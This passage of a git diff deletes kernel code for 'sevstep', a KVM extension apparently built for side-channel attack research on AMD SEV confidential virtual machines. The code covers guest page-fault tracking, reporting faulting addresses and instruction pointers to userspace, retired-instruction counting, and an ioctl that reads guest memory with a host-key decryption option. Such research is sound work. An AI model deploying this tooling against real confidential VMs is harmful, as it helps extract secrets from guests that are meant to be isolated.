vcpu->kvm->memslots[0]->memslots[0].npages; - node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); - first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); - iterat_max = first_memslot->base_gfn + first_memslot->npages; - for (iterator = 0; iterator < iterat_max; iterator++) - { - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); - if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_add_page(vcpu->kvm, slot, iterator, mode); - write_unlock(&vcpu->kvm->mmu_lock); - count++; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - } - - return count; -} -EXPORT_SYMBOL(sevstep_start_tracking); - -long -sevstep_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) -{ - struct kvm_memory_slot *slot; - struct kvm_memory_slot *first_memslot; - struct rb_node *node; - u64 iterator, iterat_max; - long count = 0; - int idx; - - // Vincent: Memslots interface changed into a rb tree, see - // here: https:// lwn.net/Articles/856392/ - // and here: https:// lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u - // Thus we use instead of - // iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn - // + vcpu->kvm->memslots[0]->memslots[0].npages; - node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); - first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); - iterat_max = first_memslot->base_gfn + first_memslot->npages; - for (iterator=0; iterator < iterat_max; iterator++) - { - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); - // Vincent: I think see here - // https:// patchwork.kernel.org/project/kvm/patch/20210924163152.289027-22-pbonzini@redhat.com/ - if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_remove_page(vcpu->kvm, slot, iterator, mode); - write_unlock(&vcpu->kvm->mmu_lock); - count++; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - } - - return count; -} -EXPORT_SYMBOL(sevstep_stop_tracking); - -int -sevstep_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip) -{ - return 0; -} diff --git a/sevstep/uapi.h b/sevstep/uapi.h @@ -1,95 +0,0 @@ -#pragma once - -#include <linux/ioctl.h> -#include <linux/types.h> - -#define KVM_TRACK_PAGE _IOWR(KVMIO, 0x20, track_page_param_t) -#define KVM_USPT_REGISTER_PID _IOWR(KVMIO, 0x21, userspace_ctx_t) -#define KVM_USPT_WAIT_AND_SEND _IO(KVMIO, 0x22) -#define KVM_USPT_POLL_EVENT _IOWR(KVMIO, 0x23, page_fault_event_t) -#define KVM_USPT_ACK_EVENT _IOWR(KVMIO, 0x24, ack_event_t) -#define KVM_READ_GUEST_MEMORY _IOWR(KVMIO, 0x25, read_guest_memory_t) -#define KVM_USPT_RESET _IO(KVMIO, 0x26) -#define KVM_USPT_TRACK_ALL _IOWR(KVMIO, 0x27, track_all_pages_t) -#define KVM_USPT_UNTRACK_ALL _IOWR(KVMIO, 0x28, track_all_pages_t) -#define KVM_USPT_SETUP_RETINSTR_PERF _IOWR(KVMIO, 0x30, retired_instr_perf_config_t) -#define KVM_USPT_READ_RETINSTR_PERF _IOWR(KVMIO, 0x31, retired_instr_perf_t) -#define KVM_USPT_BATCH_TRACK_START _IOWR(KVMIO, 0x32, batch_track_config_t) -#define KVM_USPT_BATCH_TRACK_STOP _IOWR(KVMIO, 0x33, batch_track_stop_and_get_t) -#define KVM_USPT_BATCH_TRACK_EVENT_COUNT _IOWR(KVMIO, 0x34, batch_track_event_count_t) - -#define KVM_USPT_POLL_EVENT_NO_EVENT 1000 -#define KVM_USPT_POLL_EVENT_GOT_EVENT 0 - -enum kvm_page_track_mode { - KVM_PAGE_TRACK_WRITE, - KVM_PAGE_TRACK_ACCESS, - KVM_PAGE_TRACK_RESET_ACCESSED, - KVM_PAGE_TRACK_EXEC, - KVM_PAGE_TRACK_RESET_EXEC, - KVM_PAGE_TRACK_MAX, -}; - -typedef struct { - __u64 id; // filled automatically - __u64 faulted_gpa; - __u32 error_code; - __u8 have_rip_info; - __u64 rip; - __u64 ns_timestamp; - __u8 have_retired_instructions; - __u64 retired_instructions; -} page_fault_event_t; - -typedef struct { - __s32 tracking_type; - __u64 expected_events; - __s32 perf_cpu; - __u8 retrack; -} batch_track_config_t; - -typedef struct { - __u64 event_count; -} batch_track_event_count_t; - -typedef struct { - page_fault_event_t* out_buf; - __u64 len; - __u8 error_during_batch; -} batch_track_stop_and_get_t; - -typedef struct { - __s32 cpu; // cpu on which we want to read the counter - __u64 retired_instruction_count; // result param -} retired_instr_perf_t; - -typedef struct { - __s32 cpu; // cpu on which counter should be programmed -} retired_instr_perf_config_t; - -typedef struct { - __u64 gpa; - __u64 len; - __u8 decrypt_with_host_key; - __s32 wbinvd_cpu; // -1: do not flush; else logical cpu on which we flush - void *output_buffer; -} read_guest_memory_t; - -typedef struct { - __s32 pid; - __u8 get_rip; -} userspace_ctx_t; - -typedef struct { - __u64 id; -} ack_event_t; - -typedef struct { - __u64 gpa; - __s32 track_mode; -} track_page_param_t; - -typedef struct { - __s32 track_mode; -} track_all_pages_t; - diff --git a/sevstep/uspt.c b/sevstep/uspt.c @@ -1,489 +0,0 @@ -#include "uspt.h" -#include "sevstep.h" - -#include "svm/cachepc/cachepc.h" - -#include <linux/kvm.h> -#include <linux/timekeeping.h> -#include <linux/uaccess.h> -#include <linux/types.h> -#include <linux/vmalloc.h> -#include <linux/printk.h> -#include <linux/ratelimit.h> - -#define ARRLEN(x) (sizeof(x)/sizeof((x)[0])) - -typedef struct { - bool is_active; - int tracking_type; - bool retrack; - - int perf_cpu; - - uint64_t gfn_retrack_backlog[10]; - int gfn_retrack_backlog_next_idx; - - page_fault_event_t * events; - uint64_t event_next_idx; - uint64_t events_size; - - bool error_occured; -} batch_track_state_t; - -typedef struct { - uint64_t idx_for_last_perf_reading; - uint64_t last_perf_reading; - uint64_t delta_valid_idx; - uint64_t delta; -} perf_state_t; - -// crude sync mechanism. don't know a good way to act on errors yet. -static uint64_t last_sent_event_id = 1; -static uint64_t last_acked_event_id = 1; -DEFINE_RWLOCK(event_lock); - -static page_fault_event_t sent_event; -static int have_event = 0; - -static bool get_rip = true; - -static int inited = 0; - -DEFINE_SPINLOCK(batch_track_state_lock); -static batch_track_state_t batch_track_state; - -static perf_state_t perf_state; - -static uint64_t perf_state_update_and_get_delta(uint64_t current_event_idx); - -void -sevstep_uspt_clear(void) -{ - write_lock(&event_lock); - inited = 0; - last_sent_event_id = 1; - last_acked_event_id = 1; - have_event = 0; - get_rip = false; - write_unlock(&event_lock); -} - -int -sevstep_uspt_initialize(int pid, bool should_get_rip) -{ - write_lock(&event_lock); - inited = 1; - last_sent_event_id = 1; - last_acked_event_id = 1; - have_event = 0; - get_rip = should_get_rip; - write_unlock(&event_lock); - - return 0; -} - -int -sevstep_uspt_is_initialiized() -{ - return inited; -} - -bool -sevstep_uspt_should_get_rip() -{ - bool tmp; - - read_lock(&event_lock); - tmp = get_rip; - read_unlock(&event_lock); - - return tmp; -} - -int -sevstep_uspt_send_and_block(uint64_t faulted_gpa, uint32_t error_code, - bool have_rip, uint64_t rip) -{ - ktime_t abort_after; - page_fault_event_t message_for_user; - - read_lock(&event_lock); - if (!sevstep_uspt_is_initialiized()) { - pr_warn("sevstep_uspt_send_and_block: ctx not initialized!\n"); - read_unlock(&event_lock); - return 1; - } - read_unlock(&event_lock); - - write_lock(&event_lock); - if (last_sent_event_id != last_acked_event_id) { - pr_warn("sevstep_uspt_send_and_block: " - "event id_s out of sync, aborting. Fix this later\n"); - write_unlock(&event_lock); - return 1; - } else { - // TODO: handle overflow - last_sent_event_id++; - } - message_for_user.id = last_sent_event_id; - message_for_user.faulted_gpa = faulted_gpa; - message_for_user.error_code = error_code; - message_for_user.have_rip_info = have_rip; - message_for_user.rip = rip; - message_for_user.ns_timestamp = ktime_get_real_ns(); - message_for_user.have_retired_instructions = false; - - // for poll based system; - have_event = 1; - sent_event = message_for_user; - // printk("sevstep_uspt_send_and_block sending event %llu\n", sent_event.id); - - write_unlock(&event_lock); - - // wait for ack, but with timeout. Otherwise small bugs in userland - // easily lead to a kernel hang - abort_after = ktime_get() + 1000000000ULL; // 1 sec in nanosecond - while (!sevstep_uspt_is_event_done(sent_event.id)) { - if (ktime_get() > abort_after) { - pr_warn("sevstep_uspt_send_and_block: " - "Waiting for ack of event %llu timed out, " - "continuing\n",sent_event.id); - return 3; - } - } - - return 0; -} - -int -sevstep_uspt_is_event_done(uint64_t id) -{ - int res; - - read_lock(&event_lock); - res = last_acked_event_id >= id; - read_unlock(&event_lock); - - return res; -} - -int -sevstep_uspt_handle_poll_event(page_fault_event_t* userpace_mem) -{ - int err; - - // most of the time we won't have an event - read_lock(&event_lock); - if (!have_event) { - read_unlock(&event_lock); - return KVM_USPT_POLL_EVENT_NO_EVENT; - } - read_unlock(&event_lock); - - write_lock(&event_lock); - if (have_event) { - err = copy_to_user(userpace_mem, - &sent_event, sizeof(page_fault_event_t)); - have_event = 0; - } else { - err = KVM_USPT_POLL_EVENT_NO_EVENT; - } - write_unlock(&event_lock); - - return err; -} - -int -sevstep_uspt_handle_ack_event_ioctl(ack_event_t event) -{ - int err = 0; - - write_lock(&event_lock); - if (event.id == last_sent_event_id) { - last_acked_event_id = last_sent_event_id; - } else { - err = 1; - pr_warn("sevstep_uspt_handle_ack_event_ioctl: " - "last sent event id is %llu but received ack for %llu\n", - last_sent_event_id, event.id); - } - write_unlock(&event_lock); - - return err; -} - -// get retired instructions between current_event_idx-1 and current_event_idx -// value is cached for multiple calls to the same current_event_idx -uint64_t -perf_state_update_and_get_delta(uint64_t current_event_idx) -{ - uint64_t current_value; - - /* check if value is "cached" */ - if (perf_state.delta_valid_idx == current_event_idx) { - if (current_event_idx == 0) { - perf_state.idx_for_last_perf_reading = current_event_idx; - perf_state.last_perf_reading = cachepc_read_pmc(0); - } - return perf_state.delta; - } - - /* otherwise update, but logic is only valid for two consecutive events */ - if (current_event_idx != perf_state.idx_for_last_perf_reading+1) { - pr_warn("perf_state_update_and_get_delta: " - "last reading was for idx %llu but was queried for %llu\n", - perf_state.idx_for_last_perf_reading, current_event_idx); - } - - current_value = cachepc_read_pmc(0); - perf_state.delta = (current_value - perf_state.last_perf_reading); - perf_state.delta_valid_idx = current_event_idx; - - perf_state.idx_for_last_perf_reading = current_event_idx; - perf_state.last_perf_reading = current_value; - - return perf_state.delta; -} - -void -sevstep_uspt_batch_tracking_inc_event_idx(void) -{ - spin_lock(&batch_track_state_lock); - batch_track_state.event_next_idx++; - spin_unlock(&batch_track_state_lock); -} - -int -sevstep_uspt_batch_tracking_start(int tracking_type,uint64_t expected_events, - int perf_cpu, bool retrack) -{ - page_fault_event_t* events; - uint64_t buffer_size, i; - - spin_lock(&batch_track_state_lock); - if (batch_track_state.is_active) { - pr_warn("sevstep_uspt_batch_tracking_start: " - "overwriting active batch track config!\n"); - if (batch_track_state.events != NULL ) { - vfree(batch_track_state.events); - } - } - batch_track_state.is_active = false; - spin_unlock(&batch_track_state_lock); - - buffer_size = expected_events * sizeof(page_fault_event_t); - pr_warn("sevstep_uspt_batch_tracking_start: " - "trying to alloc %llu bytes buffer for events\n", - buffer_size); - events = vmalloc(buffer_size); - if (events == NULL) { - pr_warn("sevstep_uspt_batch_tracking_start: " - "faperf_cpuiled to alloc %llu bytes for event buffer\n", - buffer_size); - return 1; // note: lock not held here - } - - // access each element once to force them into memory, improving performance - // during tracking - for (i = 0; i < expected_events * sizeof(page_fault_event_t); i++) { - ((volatile uint8_t*)events)[i] = 0; - } - - perf_state.idx_for_last_perf_reading = 0; - perf_state.last_perf_reading = 0; - perf_state.delta_valid_idx = 0; - perf_state.delta = 0; - cachepc_init_pmc(0, 0xc0, 0x00, PMC_GUEST, PMC_KERNEL | PMC_USER); - - spin_lock(&batch_track_state_lock); - - batch_track_state.perf_cpu = perf_cpu; - batch_track_state.retrack = retrack; - - batch_track_state.events = events; - batch_track_state.event_next_idx = 0; - batch_track_state.events_size = expected_events; - - batch_track_state.gfn_retrack_backlog_next_idx = 0; - batch_track_state.tracking_type = tracking_type; - batch_track_state.error_occured = false; - - batch_track_state.is_active = true; - - spin_unlock(&batch_track_state_lock); - - return 0; -} - -void -sevstep_uspt_batch_tracking_handle_retrack(struct kvm_vcpu* vcpu, - uint64_t current_fault_gfn) -{ - uint64_t ret_instr_delta; - int i, next_idx; - - spin_lock(&batch_track_state_lock); - - if (!batch_track_state.retrack) { - spin_unlock(&batch_track_state_lock); - return; - } - - if (smp_processor_id() != batch_track_state.perf_cpu) { - pr_warn("sevstep_uspt_batch_tracking_handle_retrack: perf was " - "programmed on logical cpu %d but handler was called " - "on %d. Did you forget to pin the vcpu thread?\n", - batch_track_state.perf_cpu, smp_processor_id()); - } - ret_instr_delta = perf_state_update_and_get_delta(batch_track_state.event_next_idx); - - // faulting instructions is probably the same as on last fault - // try to add current fault to retrack log and return - // for first event idx we do not have a valid ret_instr_delta. - // Retracking for the frist time is fine, if we loop, we end up here - // again but with a valid delta on one of the next event - if ((ret_instr_delta < 2) && ( batch_track_state.event_next_idx != 0)) { - next_idx = batch_track_state.gfn_retrack_backlog_next_idx; - if (next_idx >= ARRLEN(batch_track_state.gfn_retrack_backlog)) { - pr_warn("sevstep_uspt_batch_tracking_handle_retrack: " - "retrack backlog full, dropping retrack for fault " - "at 0x%llx\n", current_fault_gfn); - } else { - batch_track_state.gfn_retrack_backlog[next_idx] = current_fault_gfn; - batch_track_state.gfn_retrack_backlog_next_idx++; - } - - spin_unlock(&batch_track_state_lock); - return; - } - - /* made progress, retrack everything in backlog and reset idx */ - for (i = 0; i < batch_track_state.gfn_retrack_backlog_next_idx; i++) { - sevstep_track_single_page(vcpu, - batch_track_state.gfn_retrack_backlog[i], - batch_track_state.tracking_type); - } - - /* add current fault to list */ - batch_track_state.gfn_retrack_backlog[0] = current_fault_gfn; - batch_track_state.gfn_retrack_backlog_next_idx = 1; - - spin_unlock(&batch_track_state_lock); - -} - -int -sevstep_uspt_batch_tracking_save(uint64_t faulted_gpa, uint32_t error_code, - bool have_rip, uint64_t rip) -{ - uint64_t ret_instr_delta; - page_fault_event_t* event; - - spin_lock(&batch_track_state_lock); - - if (!batch_track_state.is_active) { - pr_warn("sevstep_uspt_batch_tracking_save: " - "got save but batch tracking is not active!\n"); - batch_track_state.error_occured = true; - spin_unlock(&batch_track_state_lock); - return 1; - } - - - if (batch_track_state.event_next_idx >= batch_track_state.events_size) { - pr_warn("sevstep_uspt_batch_tracking_save: events buffer is full!\n"); - batch_track_state.error_occured = true; - spin_unlock(&batch_track_state_lock); - return 1; - } - - if (smp_processor_id() != batch_track_state.perf_cpu) { - pr_warn("sevstep_uspt_batch_tracking_save: perf was " - "programmed on logical cpu %d but handler was called " - "on %d. Did you forget to pin the vcpu thread?\n", - batch_track_state.perf_cpu, smp_processor_id()); - } - ret_instr_delta = perf_state_update_and_get_delta(batch_track_state.event_next_idx); - - - if (batch_track_state.events == NULL) { - pr_warn("sevstep_uspt_batch_tracking_save: events buf was " - "NULL but \"is_active\" was set! This should never happen!!!\n"); - spin_unlock(&batch_track_state_lock); - return 1; - } - - event = &batch_track_state.events[batch_track_state.event_next_idx]; - event->id = batch_track_state.event_next_idx; - event->faulted_gpa = faulted_gpa; - event->error_code = error_code; - event->have_rip_info = have_rip; - event->rip = rip; - event->ns_timestamp = ktime_get_real_ns(); - event->have_retired_instructions = true; - event->retired_instructions = ret_instr_delta; - - // old inc was here - - if (batch_track_state.gfn_retrack_backlog_next_idx - > ARRLEN(batch_track_state.gfn_retrack_backlog)) { - pr_warn("sevstep_uspt_batch_tracking_save: " - "gfn retrack backlog overflow!\n"); - batch_track_state.error_occured = true; - spin_unlock(&batch_track_state_lock); - return 1; - } - - spin_unlock(&batch_track_state_lock); - - return 0; -} - -int -sevstep_uspt_batch_tracking_stop(page_fault_event_t* results, - uint64_t len, __u8* error_occured) -{ - spin_lock(&batch_track_state_lock); - if (!batch_track_state.is_active) { - pr_warn("sevstep_uspt: batch tracking not active\n"); - spin_unlock(&batch_track_state_lock); - return 1; - - } - batch_track_state.is_active = false; - - if (len > batch_track_state.event_next_idx) { - pr_warn("sevstep_uspt_batch_tracking_stop: " - "requested %llu events but got only %llu\n", - len, batch_track_state.event_next_idx); - spin_unlock(&batch_track_state_lock); - return 1; - } - - memcpy(results,batch_track_state.events, len*sizeof(page_fault_event_t)); - vfree(batch_track_state.events); - - *error_occured = batch_track_state.error_occured; - - spin_unlock(&batch_track_state_lock); - - return 0; -} - -uint64_t -sevstep_uspt_batch_tracking_get_events_count() -{ - uint64_t buf; - - spin_lock(&batch_track_state_lock); - buf = batch_track_state.event_next_idx; - spin_unlock(&batch_track_state_lock); - - return buf; -} - -bool -sevstep_uspt_batch_tracking_in_progress() -{ - return batch_track_state.is_active; -} diff --git a/test/sevstep.c b/test/sevstep.c @@ -1,4 +1,4 @@ -#include "sevstep/uapi.h" +#include "cachepc/uapi.h" #include <linux/kvm.h> #include <sys/ioctl.h>